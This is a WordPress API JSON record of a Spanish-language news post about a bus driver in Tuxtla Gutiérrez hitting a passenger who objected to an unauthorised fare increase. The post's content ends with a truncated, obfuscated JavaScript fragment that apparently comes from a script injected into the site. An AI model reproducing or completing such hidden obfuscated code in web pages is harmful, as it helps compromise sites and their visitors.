{"id":14643,"date":"2024-03-13T02:51:49","date_gmt":"2024-03-13T02:51:49","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14643"},"modified":"2024-03-13T02:51:50","modified_gmt":"2024-03-13T02:51:50","slug":"chofer-de-colectivo-agrede-a-usuaria-que-reclamo-tarifa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14643","title":{"rendered":"Chofer de colectivo agrede a usuaria que reclam\u00f3 tarifa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"721\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710298116737-721x1024.jpg\" alt=\"\" class=\"wp-image-14644\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710298116737-721x1024.jpg 721w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710298116737-211x300.jpg 211w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710298116737-768x1090.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710298116737.jpg 1080w\" sizes=\"auto, (max-width: 721px) 100vw, 721px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 12 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; El tema del aumento de la tarifa en el transporte p\u00fablico en la capital chiapaneca ha generado controversia y confrontaciones as\u00ed como agresiones por este tema.<\/p>\n\n\n\n<p>En las \u00faltimas horas se dio a conocer el caso de un conductor de un colectivo que agredi\u00f3 a una usuaria que reclam\u00f3 el aumento a diez pesos a pesar de que no est\u00e1 autorizado por la autoridad correspondiente.<\/p>\n\n\n\n<p>La mujer argumenta que la tarifa no es de diez pesos, y graba el momento, en que el conductor le dice que se baje y en seguida le da un manotazo.<\/p>\n\n\n\n<p>Con este hecho se evidencia la falta de preparaci\u00f3n, la falta de respeto a las leyes municipales y estatales as\u00ed como la violencia con la que actuan los Choferes de este tipo de unidades y todos los abusos que la poblaci\u00f3n debe soportar.<\/p>\n\n\n\n<p>Cabe recordar que, la Secretar\u00eda de Movilidad y Transporte ha dado a conocer que una nueva tarifa no ha sido autorizada.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 12 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; El tema del aumento de la tarifa en el transporte p\u00fablico en la capital chiapaneca ha generado controversia y confrontaciones as\u00ed como agresiones por este tema. En las \u00faltimas horas se dio a conocer el caso de un conductor de un colectivo que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14644,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14643","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14643","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14643"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14643\/revisions"}],"predecessor-version":[{"id":14645,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14643\/revisions\/14645"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14644"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14643"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14643"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14643"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}